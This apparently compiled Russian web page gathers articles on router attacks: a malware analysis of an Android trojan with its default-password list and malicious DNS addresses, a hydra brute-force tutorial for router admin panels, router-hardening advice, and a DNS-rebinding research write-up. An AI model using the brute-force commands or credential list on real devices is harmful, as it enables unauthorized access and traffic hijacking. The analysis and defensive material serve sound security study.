Атака на роутер через админа: Switcher: атаки на маршрутизаторы – теперь и под Android — ПКРЕГИОН компьютерный магазин в Екатеринбурге недорогой техники каталог и цены с доставкой

Содержание

Switcher: атаки на маршрутизаторы – теперь и под Android

Недавно, в процессе нашего нескончаемого квеста по защите мира от вредоносных программ, мы обнаружили Android-троянца, который плохо себя вел. Хотя зловреды, направленные на ОС Android, некоторое время назад уже перестали быть в диковинку, этот троянец все же оказался необычным: вместо того чтобы атаковать пользователя, он атакует Wi-Fi-сеть, к которой пользователь подключен, а точнее — беспроводной маршрутизатор, который эту сеть обслуживает. Троянец, который получил название Trojan.AndroidOS.Switcher, проводит brute-force атаку, пытаясь подобрать пароль к веб-интерфейсу администрирования маршрутизатора. Если атака проходит успешно, то троянец меняет в настройках маршрутизатора адреса DNS-серверов, так что все DNS-запросы с устройств, подключенных к атакованной Wi-Fi-сети, будут перенаправляться на серверы, находящиеся под контролем киберпреступников (атаки такого типа известны также как DNS-hijacking).

Давайте рассмотрим подробно, как троянец Switcher проводит свои brute-force атаки, проникает в маршрутизаторы и производит подмену DNS.

Миленькие маленькие подделки

На сегодняшний момент мы наблюдаем две версии троянца:

acdb7bfebf04affd227c93c97df536cf; имя пакета — com.baidu.com
64490fbecefa3fcdacd41995887fe510; имя пакета — com.snda.wifi

Первая версия (com.baidu.com) выдает себя за мобильный клиент китайского поисковика Baidu, просто открывая из приложения ссылку http://m.baidu.com. Вторая версия представляет собой хорошо сделанную фальшивую версию популярного китайского приложения, в котором пользователи делятся друг с другом информацией о Wi-Fi-сетях (в т.ч. паролями к ним). Информация такого рода может быть полезна, например, тем, кто находится в командировке, чтобы подсоединяться к публичным Wi-Fi-сетям, к которым они не знают паролей. С позиции киберпреступников, помещать в такое приложение зловреды, заражающие маршрутизаторы, – это отличная идея, поскольку пользователи таких приложений обычно подсоединяются ко множеству Wi-Fi-сетей, распространяя тем самым заражение.

Киберпреступники даже создали веб-сайт (впрочем, довольно плохого качества) для рекламы и распространения вышеупомянутой фальшивой версии com.snda.wifilocating. Веб-сервер, который обеспечивает хостинг сайта, также используется злоумышленниками в качестве командного сервера.

Процесс заражения

Троянец выполняет следующие действия:

1. Получает идентификатор BSSID сети и сообщает командному серверу об активации троянца в сети с этим BSSID.

2. Пытается получить имя интернет-провайдера (ISP) и с его помощью определяет, какой вредоносный DNS-сервер будет использоваться для захвата DNS. Существует три возможных DNS-сервера: 101.200.147.153, 112.33.13.11 и 120.76.249.59. По умолчанию выбирается 101.200.147.153, два других используются только для конкретных интернет-провайдеров.

3. Начинает атаку методом перебора, используя следующий заранее заданный словарь логинов и паролей:

admin:00000000
admin:admin
admin:123456
admin:12345678
admin:123456789
admin:1234567890
admin:66668888
admin:1111111
admin:88888888
admin:666666
admin:87654321
admin:147258369
admin:987654321
admin:66666666
admin:112233
admin:888888
admin:000000
admin:5201314
admin:789456123
admin:123123
admin:789456123
admin:0123456789
admin:123456789a
admin:11223344
admin:123123123

Троянец получает адрес шлюза по умолчанию и затем пытается получить к нему доступ через встроенный браузер. С помощью JavaScript он пытается залогиниться, используя различные комбинации логинов и паролей. Судя по жестко заданным названиям полей ввода и по структурам HTML-документов, к которым троянец пытается получить доступ, используемый код JavaScript работает только с веб-интерфейсами Wi-Fi маршрутизаторов производителя TP-LINK.

4. При успешной попытке получить доступ к интерфейсу администрирования, троянец заходит на страницу настроек WAN-сети и меняет адрес первичного DNS-сервера на адрес вредоносного DNS-сервера, контролируемого киберпреступниками, а также меняет адрес вторичного DNS-сервера на 8.8.8.8 (это публичный DNS-сервер Google – таким образом обеспечивается стабильность в случае отказа вредоносного DNS-сервера). В коде, выполняющем эти действия, разобраться сложно, поскольку он предназначен для работы на моделях маршрутизаторов и работает в асинхронном режиме. Тем не менее, я продемонстрирую, как он работает, используя скриншот веб-интерфейса и представляя нужные части кода один за другим.

5. Если DNS-адреса заменены успешно, троянец посылает об этом отчет на командный сервер.

Так в чем же проблема?

Чем же опасны вышеописанные действия? Для ответа важно понимать основные принципы работы DNS. Служба DNS используется для того, чтобы разрешить (преобразовать) удобное для человека название сетевого ресурса (например, веб-сайта) в IP-адрес, который фактически используется для коммуникаций в компьютерной сети. Например, название сайта ‘google.com’ разрешается в IP-адрес 87.245.200.153. Обычно нормальный DNS-запрос выполняется следующим образом:

Во время атаки типа DNS-hijacking киберпреступники меняют настройки TCP/IP на устройстве жертвы (которым в нашем случае является маршрутизатор) с тем, чтобы это устройство отправляло DNS-запросы на контролируемый ими вредоносный DNS-сервер. Таким образом, схема примет следующий вид:

Как видим, вместо взаимодействия с реальным сайтом google.com пользователь (сам того не замечая) будет обращаться к совершенно другому сетевому ресурсу – это может быть фальшивый сайт google.com, который будет сохранять все поисковые запросы пользователя и отсылать их киберпреступникам, или просто случайный веб-сайт со множеством всплывающих окон или с вредоносными программами, или какой-нибудь еще. Злоумышленники получают почти полный контроль над сетевым трафиком, использующим систему разрешения имен (в частности, над всем веб-трафиком).

Читатель может задать вопрос: какое это все имеет значение, ведь маршрутизаторы не просматривают веб-сайты, в чем же риск? При наиболее распространенных настройках Wi-Fi-маршрутизаторов все DNS-настройки подключенных к ним устройств устанавливаются такими же, как у маршрутизатора, и если в маршрутизаторе оказывается прописан вредоносный DNS-сервер, то к нему будут обращаться и все подключенные к маршрутизатору сетевые устройства. Таким образом, получив доступ к DNS-настройкам маршрутизатора, злоумышленник сможет контролировать практически весь трафик в сети, обслуживаемой этим маршрутизатором.

По недосмотру киберпреступники оставили свою внутреннюю статистику заражений в открытой части веб-сайта командного сервера.

Согласно этой статистике, они смогли проникнуть в 1280 Wi-Fi-сетей. Если это действительно так, то трафик всех пользователей этих сетей может перенаправляться на вредоносные DNS-серверы.

Заключение

Trojan.AndroidOS.Switcher не нападает напрямую на пользователей. Вместо этого он нацеливается сразу на целую сеть, так что все пользователи сети оказываются уязвимы к атакам самого разного рода – от фишинга до вторичного заражения. Такие манипуляции с настройками маршрутизаторов опасны тем, что эти новые настройки переживут даже перезапуск маршрутизатора, а установить факт DNS-hijacking довольно сложно. Даже если вредоносные DNS-серверы на какое-то время перестанут работать, DNS-запросы будут перенаправляться на вторичный DNS-сервер 8.8.8.8, так что пользователи и/или IT-служба ничего не заподозрят.

Мы рекомендуем всем пользователя проверить DNS-настройки своих сетей и поискать следующие IP-адреса вредоносных DNS-серверов:

101.200.147.153
112.33.13.11
120.76.249.59

Если вы обнаружите любой из этих серверов в ваших DNS-настройках, обратитесь на линию поддержки своего интернет-провайдера или сообщите владельцу Wi-Fi-сети. «Лаборатория Касперского» также настойчиво рекомендует всем пользователям сменить заводские логины и пароли в веб-интерфейсе вашего маршрутизатора – так вы обезопасите себя от подобных атак в будущем.

Взлом «админки» роутера / Хабр

*Здесь могло быть предупреждение о том, что не нужно пользоваться данной программой в преступных целях, но hydra это пишет перед каждым сеансом взлома*

В общем, решил я по своим нуждам покопаться в настройках роутера, вбиваю я всем знакомый адрес, а тут пароль спрашивают. Как быть? Ну, начал я перебирать пароли, а их количество слишком большое, что бы перебирать все и слишком маленькое, чтобы делать reset.

И я открыл google. После пары запросов я узнал о такой вещи как hydra. И тут началось: жажда открытий, поиски неизведанного и так далее.

Приступим

Первым делом мной был составлен словарь паролей, ни много, ни мало, аж на 25 комбинаций. Далее качаем либо Kali linux, либо саму Гидру (если

~~вы пингвин~~

у вас линукс). Теперь у нас два варианта (ну как два, я нашел информацию по двум вариантам).

Либо у вас вот такое диалоговое окно:

Либо логин и пароль запрашивает форма на сайте. Мой вариант первый, поэтому начнем с него. На нашем пути к «админке» стоит страж в виде диалогового окна. Это вид авторизации http-get.

Открываем терминал. Вводим:

hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /

Где после «-l» идет логин, после «-P» словарь, после «-s» порт. Также в нашем распоряжении есть другие флаги:

-R восстановить предыдущую прерванную/оборванную сессию
-S выполнить SSL соединение
-s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь
-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА

-p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА
-x МИНИМУМ: МАКСИМУМ: НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите «-x -h» для помощи
-e nsr «n» — пробовать с пустым паролем, «s» — логин в качестве пароля и/или «r» — реверс учётных данных
-u зацикливаться на пользователя, а не на парлях (эффективно! подразумевается с использованием опции -x)
-C ФАЙЛ формат где «логин: пароль» разделены двоеточиями, вместо опции -L/-P
-M ФАЙЛ список серверов для атак, одна запись на строку, после двоеточия ‘:’ можно задать порт
-o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода
-f / -F выйти, когда пара логин/пароль подобрана (-M: -f для хоста, -F глобально)
-t ЗАДАЧИ количество запущенных параллельно ЗАДАЧ (на хост, по умолчанию: 16)
-w / -W ВРЕМЯ время ожидания ответов (32 секунды) / между соединениями на поток
-4 / -6 предпочитать IPv4 (по умолчанию) или IPv6 адреса

-v / -V / -d вербальный режим / показывать логин+пароль для каждой попытки / режим отладки
-q не печатать сообщения об ошибках соединения
-U подробные сведения об использовании модуля
server цель: DNS, IP или 192.168.0.0/24 (эта ИЛИ опция -M)
service служба для взлома (смотрите список поддерживаемых протоколов)
OPT некоторые модули служб поддерживают дополнительный ввод (-U для справки по модулю)

Ну вот так как-то:

Второй вариант:

Не мой, честно взят с Античата, с исправлением грамматических ошибок автора (Обилие знаков пунктуации я оставил). Интересно это можно считать переводом?

Нас встречает форма на сайте:

Такой метод авторизации —

http-post-form

, и тут нужно немного повозится, так как нам нужно понять, как браузер отправляет роутеру данные.

В данном случае и использовал браузер Chrome (его аналог Chromium в Kali Linux, ставится через apt-get install chromium).

Сейчас нужно сделать одну очень глупую вещь… указать неверный логин и пасс…
для чего увидим позже…

Нажимаем F12 что бы перейти в режим редактирования веб-страницы.

Переходим в Network → Включаем галочку

Preserv log

Вводим ложные логин и пароль…

Ну что за дела? Так не пойдет! Более того, после нескольких неудачных попыток входа, форма блокируется на 180 секунд.

Переходим во вкладочку HEADERS ищем строку:

 Request URL:http://192.168.0.1/index.cgi

Отрезаем все до ip-адреса — /index.cgi… Поздравляю мы нашли первую часть скрипта авторизации… Идем дальше… Переходим к вкладке

FORM DATA

и изменяем режим отображения на

VIEV SOURCE

update_login=login&update_password=password&check_auth=y&tokenget=1300&
update_login=login&update_password=password

Бинго! Мы нашли вторую часть скрипта авторизации! Еще чуть-чуть! теперь нужно найти страницу с сообщением об ошибке… Нужно нажать на вкладку ELEMENTS.

И выбрать элемент HTML кода (CTRL+SHIFT+C) и выбрать окно с сообщением об ошибки… в данном случае — Authentication failed!

<span langkey="bad_auth">Authentication failed!</span>

Выбираем:

span langkey="bad_auth"

и немножко правим… bad_auth — все! Ключ практически у нас в кармане… Теперь мы можем полностью написать строку авторизации:

index.:bad_auth"

Обратите внимание что между частями скрипта двоеточие! это обязательно! Кстати, блокировки формы через гидру не происходило… Это очень радует.

В работоспособности второго метода мне убедиться не светит, так как я не обладатель подходящей модели роутера. Придется довериться экспрессивному человеку с Античата.

Если кому интересно, будьте добры, проверьте и отпишитесь в комментариях. Я работал с роутером TL-WR1043N/TL-WR1043ND. Роутер с Античата — D-link300NRU.

Спасибо за внимание!

Как защитить роутер? Советы по защите домашней сети от ESET.

Киев, 05 февраля 2019 г.

Сегодня роутер является центральным устройством в каждом доме, поскольку через роутер проходит весь трафик домашней сети. Именно поэтому от него часто зависит безопасность всей домашней сети, а недостаточная защитароутера может поставить под угрозу другие Ваши устройства.

Основные угрозы для безопасности данных пользователя

После заражения угрозой роутер может:

перенаправлять на веб-страницы, которые похищают учетные данные
заманивать Вас устанавливать вредоносные программы
проводить MITM-атаки
стать частью ботнета для запуска DDoS-атак на сайты или даже на инфраструктуру Интернета
использоваться для атак на другие устройства
быть инструментом для шпионажа через Интернет вещей (IoT)
использоваться для скрытого майнинга криптовалют.

Чтобы улучшить защиту роутера от хакеров, необходимо правильно настроить его параметры.

К настройкам администратора, как правило, можно получить доступ с помощью беспроводного соединения, введя IP-адрес роутера в строку URL-адреса веб-браузера. Часто в настройки можно зайти с помощью специального приложения для смартфонов.

Изменяем настройки для усиления защиты роутера

Из всех настроек по умолчанию пароль для доступа к интерфейсу администратора роутера должен быть изменен в первую очередь. В частности, для надежной защиты роутера подберите сильную и уникальную ключевую фразу вместо стандартного имени пользователя вроде «admin», «administrator», «root», «user».

Кроме снижения расходов для производителей, эти и другие настройки по умолчанию предназначены для облегчения удаленного устранения неисправностей. Однако если не изменить их, можно столкнуться с рядом проблем. Например, регистрационные данные часто очевидны и общие для отдельных моделей и даже целых брендов. Поэтому учетные данные можно легко найти в Интернете или отгадать, попробовав наиболее распространенные комбинации, например, «admin/password».

Кроме этого, часто названием беспроводной сети является бренд и модель. Измените это имя, а именно Service Set Identifier (SSID), на то, что не идентифицирует Вас или Ваше местоположение.

Также по умолчанию часто включена функция под названием Wi-Fi Protected Setup (WPS), которая предназначена для помощи в подключении новых устройств. Однако в связи с недостатками внедрения, WPS может быть легко использован для вредоносных целей, в частности для осуществления атак на пароль.

Другой особенностью, которая часто используется по умолчанию в роутерах и представляет значительный риск для безопасности, является Universal Plug and Play (UPnP). В случае отсутствия потребности в UPnP, который предназначен для обеспечения беспрепятственной связи между устройствами, лучше его выключить. Также для предотвращения потенциальных атак и защиты роутера стоит выключить все протоколы и порты, которые не используются.

Обеспечиваем защиту роутера от атак злоумышленников

Необходимо обеспечить защиту Wi-Fi с помощью настройки сложного и надежного пароля. Комбинация должна отличаться от всех других регистрационных данных пользователя, в том числе и пароля для доступа к консоли администратора роутера.

Кроме этого, необходимо указать протокол безопасности для беспроводного соединения. Единственным вариантом, который можно порекомендовать, является WPA2. Для домашних пользователей лучший вариант — персональный режим (WPA2-Personal или WPA2-PSK) WPA2, который дополнен шифрованием AES. Надежное шифрование защищает все данные при передаче между подключенным к Wi-Fi компьютером или мобильным устройством и роутером. Таким образом, злоумышленники не смогут просмотреть информацию, даже если она попала в руки киберпреступников.

На роутерах все еще могут быть доступны два старых режима безопасности Wi-Fi — WPA и WEP. Однако, их не стоит использовать, особенно последний. Поскольку WPA2 был обязательным для всех сертифицированных аппаратных средств Wi-Fi еще в 2006 году.

Некоторые с нетерпением ждут появления на рынке сетевого оборудования с поддержкой WPA3. Этот новый стандарт будет содержать значительные усовершенствования беспроводной связи, включая лучшую защиту от атак с использованием подбора пароля, быстрой разработки новинки ожидать не стоит.

Применяем регулярные обновления

Встроенное программное обеспечение роутеров, как и программное обеспечения компьютеров, требует регулярного обновления. Устройства могут содержать уязвимости из-за отсутствия обновлений встроенного программного обеспечения. Это позволяет злоумышленникам легко проникнуть внутрь сети, тогда как известные проблемы безопасности можно предотвратить с помощью простого сканирования на наличие известных уязвимостей.

Для проверки актуальности обновлений перейдите к административной панели роутера. Современные модели обновляются автоматически или сообщают о новых версиях прошивки, тогда как для применения исправления на устаревших моделях нужно посетить сайт поставщика и проверить доступность обновления. Такие действия необходимо делать регулярно, по крайней мере, несколько раз в год, чтобы обеспечить защиту роутера от новых уязвимостей.

Вполне возможно, что производитель прекратил выпускать обновления для Вашей модели, поэтому на нее не может быть установлено никаких обновлений.

Кроме исправления уязвимостей, новая версия встроенного программного обеспечения может также обладать лучшею производительностью и новыми функциями, включая те, которые связаны с механизмами безопасности.

Создаем отдельные сети для различных устройств

Любой роутер позволяет создавать несколько сетей, что особенно удобно при использовании Интернета вещей (IoT). В случае использования технологий смарт-дома нужно вынести все устройства Интернета вещей в отдельную подсеть, чтобы их уязвимости не могли быть использованы для доступа к данным на компьютере, смартфоне или других гаджетов для хранения данных. Для дополнительной защиты роутера Вы также можете создать отдельную подсеть для детей и гостей. Таким образом, возможно предотвратить риск доступа вредоносного программного обеспечения к Вашим цифровым файлам.

Также рекомендуется выключить удаленное управление роутером, чтобы уменьшить шансы преступников получить доступ к нему из любой точки мира, например, путем использования уязвимостей. Таким образом, для внесения любых изменений в настройки нужен физический доступ к роутеру.

На самом деле способов обеспечения защиты роутера значительно больше, чем было рассмотрено выше. Однако даже настройки нескольких параметров значительно улучшит общую безопасность домашней сети. Тогда как пренебрежение этими рекомендациями может привести не только к получению доступа киберпреступников к личным данным, но и использование Вашей сети для осуществления массовых атак и распространения угроз.

Атака на локальные сети из интернета через перепривязку DNS

Если вы кликните на вредоносную ссылку, злоумышленник может удаленно получить контроль над вашим Wi-Fi роутером, колонками Google Home / Sonos, приставкой Roku, домашним терморегулятором и другими устройствами.

Автор: Brannon Dorsey

Можно сказать, что домашняя сеть является сакральным местом и вашим персональным кусочком киберпространства. Здесь мы подключаем телефоны, ноутбуки и «умные» устройства к интернету и объединяем между собой для повышения удобства и качества нашей жизни. По крайней мере, так говорят в рекламных роликах. К концу второго десятилетия локальные сети все больше наводняются устройствами разного рода, начиная от умных телевизоров и мультимедийных проигрывателей и заканчивая помощниками по дому, камерами, холодильниками, дверными замками и регуляторами температуры. Короче говоря, домашние сети становятся похожи на приют для проверенных персональных и домашних устройств.

Для доступа и управления многими из вышеупомянутых устройств аутентификация сильно урезана или вообще отсутствует. По сути, эти девайсы доверяют своим соседям по сети, как если бы вы безоговорочно доверяли каждому, кто оказывался в вашем доме. Взаимодействие между устройствами происходит через UPnP и HTTP, а защита от подключений со стороны интернета лежит на фаерволе роутера. Можно сказать, что все коммуникации происходят в огороженном пространстве, защищенном от внешних угроз. Так, вероятно, думают разработчики и производители этих девайсов.

Несколько месяцев назад я начал изучать схему атак десятилетней давности с использованием перепривязки DNS (DNS rebinding). Попросту говоря, перепривязывание DNS позволяет удаленному деятелю обойти фаервол и использовать браузер жертвы в качестве прокси для прямого подключения к устройствам домашней сети. Например, кликнув по ссылке или посмотрев вредоносный баннер, вы можете непреднамеренно дать доступ злоумышленнику к вашему терморегулятору, отвечающему за температуру в вашем доме.

Примечание: в журнале Wired это исследование было одновременно опубликовано в аналогичной статье за авторством Лили Хэй Ньюмен.

В чем суть перепривязывания DNS?

Перед тем как погружаться в суть этой темы, разберемся с механизмом безопасности, который нужно обойти во время перепривязки DNS. Конкретно речь идет о политике (правиле) ограничения домена (same-origin policy). Некоторое время назад разработчики браузеров решили, что веб-страницам на одном домене нельзя отсылать произвольные запросы другому домену без разрешения со стороны второго домена. Если вы перейдете по вредоносной ссылке, целевая страница не должна отсылать HTTP-запрос банковскому сайту и использовать вашу сессию для опустошения счета. Таким образом, браузеры ограничивают отсылку HTTP-запросов с домена для доступа к ресурсам только в рамках текущего домена (или к другим доменам, разрешенным в cross—origin resource sharing)

Однако при помощи DNS можно спровоцировать взаимодействие между браузером и сторонним доменом, коммуникация с которым не разрешена явным образом.

Рассмотрим пример. Код по адресу http://malicious.website не может выполнить стандартный запрос XMLHttpRequest к сайту http://bank.com/transfer-fund, поскольку мы имеем дело с разными доменами, расцениваемые браузером как разные источники. В браузерах предусмотрено сравнение протокола, имени домена и номера порта между запросом и источником страницы, откуда отсылается запрос. Эти параметры должны быть идентичны. Звучит неплохо, не так ли?

Однако радоваться пока рано. Ни для кого не секрет, что каждое имя домена привязано к IP-адресу. Например, за именем malicious.website может быть закреплен адрес 34.192.228.43, а за сайтом bank.com – адрес 171.159.228.150. В DNS реализован механизм для трансляции легко запоминаемых имен в IP-адреса, используемых компьютерами для коммуникации друг с другом. Однако в современных браузерах во время анализа ограничений из same-origin policy используются URL’ы, а не IP-адреса. Что произойдет, если IP-адрес сайта malicious.website быстро поменяется с 34.192.228.43 на 171.159.228.150? С точки зрения браузера ничего не изменилось. Однако вместо коммуникации с сервером с файлами сайта malicious.website браузер будет взаимодействовать с сайтом bank.com. Понимаете, в чем дело? DNS может использоваться для вовлечения браузеров в коммуникацию с серверами, не разрешенными явным образом.

За последний год перепривязка DNS несколько раз оказывалась в центре внимания после обнаружения уязвимостей в популярном программном обеспечении. Наиболее примечательные случаи: видеоигры от компании Blizzard, торрент-клиент Transmission и кошельки криптовалюты Ethereum оказались уязвимы к перепривязыванию DNS. В случае с уязвимостью Ethereum Geth при определенных обстоятельствах злоумышленник мог получить полный контроль над аккаунтом жертвы и всеми монетами.

Как упоминалось выше, перепривязка DNS позволяет обходить фаервол и использовать браузер в качестве прокси для прямого доступа к устройствам в домашней сети.

Как работает перепривязывание DNS

1. Злоумышленник управляет вредоносным DNS-сервером, отвечающим на запросы касательно домена (предположим, rebind.network).

2. Злоумышленник провоцирует жертву на переход по адресу http://rebind.network в браузере. Например, при помощи фишинга или XSS или через показ HTML-баннера.

3. Как только жертва перешла по ссылке, браузер делает запрос к DNS-серверу, связанному с преобразованием имени rebind.network в IP-адрес. При получении запроса, сервер, контролируемый злоумышленником, отсылает настоящий IP-адрес (34.192.228.43). Кроме того, значение TTL устанавливается равным 1 секунду. Таким образом, кэш на машине жертвы будет актуален не очень долго.

4. Жертва загружает страницу по адресу http://rebind.network, содержащую вредоносный JavaScript-код, начинающий выполняться в браузере. Страница многократно выполняет странные POST-запросы к странице http://rebind.network/thermostat с полезной нагрузкой JSON наподобие {“tmode”: 1, “a_heat”: 95}.

5. Вначале эти запросы отсылается на веб-сервер, подконтрольный злоумышленнику, с IP-адресом 34.192.228.43, однако через некоторое время (схема DNS-кэширования в браузере выглядит странно) резольвер браузера обнаруживает, что DNS-запись для адреса rebind.network устарела, и выполняет еще один запрос.

6. DNS-сервер, подконтрольный злоумышленнику, получает от жертвы второй запрос, но в этот раз посылает 192.168.1.77, являющийся IP-адресом умного терморегулятора из локальной сети жертвы.

7. Жертва получает вредоносный DNS-ответ и вместо http://rebind.network начинает посылать HTTP-запросы на адрес 192.168.1.77. Поскольку с точки зрения браузера ничего не изменилось, отсылается еще один POST-запрос на адрес http://rebind.network/thermostat.

8. В этот раз POST-запрос отсылается на небольшой незащищенный веб-сервер, работающий в терморегуляторе, подключенного через Wi-Fi. Регулятор температуры обрабатывает запрос, и температура в доме жертвы устанавливается 35 градусов по Цельсию.

Этот сценарий был реализован в реальном эксплоите (CVE-2018–11315), найденном и использованном мной против моего умного терморегулятора Radio Thermostat CT50. Атаки, подобные вышеописанной, могут иметь еще более серьезные последствия для устройств и служб, работающих в домашней сети. Используя браузер жертвы в качестве HTTP-прокси, при помощи атак на базе перепривязки DNS можно обходить сетевые фаерволы и делать каждое устройство, защищенное в интранете, доступным злоумышленнику, работающему удаленно.

Какие устройства уязвимы?

После обнаружения и эксплуатации этой бреши в самом первом устройстве, с которым я работал, мне подумалось, что множество других IoT-устройств также могут быть уязвимы. Я начал собирать и изучать другие популярные умные домашние устройства, доступные на рынке. В течение последующих нескольких недель каждое устройство, побывавшее в моих руках, оказалось уязвимым к перепривязке DNS в той или иной степени. В некоторых случаях удавалась информационная утечка, в других – получение полного контроля над устройством. Динамик Google Home, медиаплеер Chromecast, приставка Roku, беспроводные системы Sonos и некоторые модели термостатов могут стать жертвой злоумышленника, работающего удаленно.

Выдержка из твиттера: идея о том, что локальная является защищенной – ошибочна. Если продолжать верить в эту иллюзию, пострадает много людей.

Я контактировал с производителями вышеуказанных устройств. Некоторые патчи находятся в стадии разработки, некоторые – уже выпущены (подробнее про мою находку). Я упомянул об устройствах, протестированные мной лично. Если продукция больших компаний уязвима к перепривязке DNS, значит, более мелких производителей эта проблема тоже касается, и можно сказать, что уязвимых устройств бесчисленное множество.

Рисунок 1: Поиск устройств в домашней сети, уязвимых к перепривязке DNS

Я написал экспериментальный эксплоит, пригодный для поиска уязвимых устройств в домашней сети и доступный по адресу http://rebind.network.

Динамик Google Home

Рисунок 2: Модель Google Home Mini

Приложения для управления продукцией Google Home используют незадокументированный REST API, работающий на порту 8008 устройства (например, http://192.168.1.208:8008). Первое упоминание про эту службу я нашел в 2013 году, когда Брэндон Фикет написал о локальном API, найденном во время сниффинга Wi-Fi трафика, передаваемого медиаплеером Chromecast. Прошло пять лет и, кажется, компания Google интегрировала загадочный API во все продукты Google Home. Как вы можете догадаться, на данный момент малоизвестный API стал хорошо задокументированным силами энтузиастов. На самом деле, ранее в этом году Ризвик Вибху (Rithvik Vibhu) опубликовал детальную документацию на этот API.

Этот API дает возможность расширенного контроля над устройствами без аутентификации. Например, доступны функции запуска приложения и просмотра контента, сканирования и подключения к близлежащим Wi-Fi сетям, перезагрузки и даже сброса настроек до заводских.

Представьте ситуацию, когда вы просматривайте сайт и вдруг настройки вашего динамика Google Home сбрасываются. Или ваш сосед по квартире оставил браузер открытым и HTML-баннер отправил ваш медиаплеер Chromecast в цикл перезагрузки в то время, когда вы смотрите кино? Мой любимый сценарий использования этого API – сканирование Wi-Fi. Используя эту возможность в сочетании с публично доступными данными вардрайвинга, злоумышленники могут узнать точную геолокацию на базе вашего списка близлежащих Wi-Fi сетей. Подобная атака окажется успешной, даже если вы отключили API геолокации в браузере и используете VPN для туннелирования трафика через другую страну.

Вот пример информации, которую мне удалось извлечь с моего Chromecast. Можете догадаться, где я писал этот пост?

Обновление от 19 июня 2018 года: Крэйг Янг одновременно со мной исследовал эту уязвимость и опубликовал результаты перед моим постом. Крэйг создал концептуальный код для осуществления атаки, связанной с геолокацией, описанной выше, но саму атаку ни разу не реализовал. Работа Крейга вместе с комментарием Брайана Креба определенно заслуживают внимания.

Я уведомил Google об этой проблеме в марте во время обнаружения и еще раз в апреле вследствие отсутствия какой-либо реакции. Согласно статье Креба, Янг сообщил об уязвимости в Google, но тикет был закрыт с комментарием «Статус: Исправлено не будет (Так и задумывалось)». Исправления не выходили до тех пор, пока Креб вышел на контакт с Google, и проблему согласились исправить. Ожидается, что Google выпустит патч в середине июля 2018 года.

Беспроводная колонка Sonos

Рисунок 3: Sonos Play:1

Как и Google Home, беспроводные колонки Sonos также могут оказаться под управлением злоумышленника удаленно (CVE-2018–11316). Кликнув по вредоносной ссылке, ваш приятный вечер под музыку джаза может оказаться прерван. Эта шутка пригодна для простых и безвредных пранков.

После недолгих поисков я нашел несколько интересных ссылок на веб-сервере Sonos UPnP, которые могут оказаться не столь невинными. Кажется, на устройстве есть несколько скрытых веб-страниц для отладочных целей. На странице http://192.168.1.76:1400/support/review содержит XML файл с результатами выполнения различных Unix-команд на устройстве (на котором, скорее всего, работает дистрибутив Linux).

В разделе http://192.168.1.76:1400/tools есть простейшая HTML-форма, позволяющая запускать некоторые Unix-команды на устройстве Sonos, а HTTP API позволяет злоумышленнику, работающему удаленно, исследовать внутренние и внешние сети при помощи команды traceroute и отправлять к хостам ICMP-запросы при помощи команды ping и простых POST-запросов. Злоумышленник может использовать колонку Sonos как отправную точку для составления сетевой топологии и сбора информации о подключениях, необходимую для реализации последующих атак.

Обновление от 19 июня 2018 года: В Sonos сделали заявление вместе с этой публикацией: «После изучения возможностей по реализации перепривязки DNS мы немедленно приступили к созданию патча, который выйдет в июльском обновлении».

Приставка Roku

Рисунок 4: RokuTV

Во время исследования сети в холле здания, где я работаю, был обнаружен HTTP-сервер на порту 8060 устройства RokuTV. Вскоре я выяснил, что External Control API этого девайса позволяет управлять базовой функциональностью: запуском приложения, поиском и проигрыванием файлов. Кроме того, доступно управление через кнопку и нажатие клавиш как на виртуальном пульте. Доступны также входные каналы к сенсорам, включая акселерометр, датчик ориентации, гироскоп и даже магнитометр (зачем?). Как вы вероятно догадались, локальное API не требует аутентификации и может эксплуатироваться через перепривязку DNS (CVE-2018–11314).

Я рассказал о своих находках специалистам по безопасности компании Roku и получил следующий ответ:

Риска для наших покупателей или платформы этот API не несет. Мы знаем о веб-приложениях наподобие http://remoku.tv, при помощи которого через браузер можно взаимодействовать с устройством, находящимся в той же самой локальной сети.

После описания детального сценария атаки вице-президент, курирующий вопросы безопасности в компании, сказал, что команда «рассматривает этот инцидент как актуальную угрозу, а не как рядовой случай». В итоге выпуск релиза Roku OS 8.1 был немедленно приостановлен и началась разработка патча. Ожидалось, что весь процесс займет около 3-4 месяцев, если не удастся найти адекватное решение для текущего релиза.

После некоторых размышления я проинформировал специалистов ROKU, что работаю репортером в WIRED и планирую вскоре опубликовать свое исследование. На следующее утро я получил письмо, где сообщалось о завершении разработки патча и начале процесса обновления прошивок у 20 миллионов устройств.

Обновление от 19 июня 2018 года: Компания Roku выпустила заявление вместе с публикацией этой статьи: «После того как мы узнали о проблеме, связанной с DNS привязкой, был создан патч. Устройства у покупателей на данный момент обновляются. Обратите внимание, что любая потенциальная эксплуатация этой уязвимости не несет рисков, связанных с безопасностью, для учетных записей наших покупателей и партнеров по продажам или платформы Roku».

Радиотермостат

Рисунок 5: Радиотермостат CT50

Радиотермостаты CT50 и CT80 содержат наиболее серьезные уязвимости среди найденных мной. Эти устройства являются наиболее дешевыми среди «умных» термостатов, доступных на рынке на данный момент. Я заказал одно устройство после того как узнал о недостаточной безопасности подобных девайсов из бюллетеня CVE-2013–4860, где сообщалось об отсутствии аутентификации и возможности контроля кем попало, кто находится в одной сети с девайсом. Дэниел Кроули из компании Trustwave SpiderLabs несколько раз пытался сообщить производителю об уязвимости, но ответа не последовало, и отчет о бреши был опубликован. К сожалению, отсутствие ответа часто является причиной публикации отчетов, особенно в случае с мелкими производителями. Я предполагаю, что уязвимость, скорее всего, оставалась неисправленной в течение 5 лет, и заказал новую модель CT50.

Мое предположение оказалось верным, и API для управления терморегулятором было уязвимо к перепривязке DNS. Стоит ли говорить о возможных последствиях, если терморегулятор вашего здания окажется под контролем злоумышленника, работающего удаленно? Экспериментальный эксплоит по адресу http://rebind.network извлекает некоторую базовую информацию из термостата прежде, чем установить температуру 35 градусов по Цельсию. Эта температура может оказаться опасной или даже смертельной в жаркие летние месяцы особенно для пожилых людей или людей с ограниченными возможностями. Если же ваш домашний девайс оказалось под контролем злоумышленника, пока вы были в отпуске, счет за электричество может оказаться огромным.

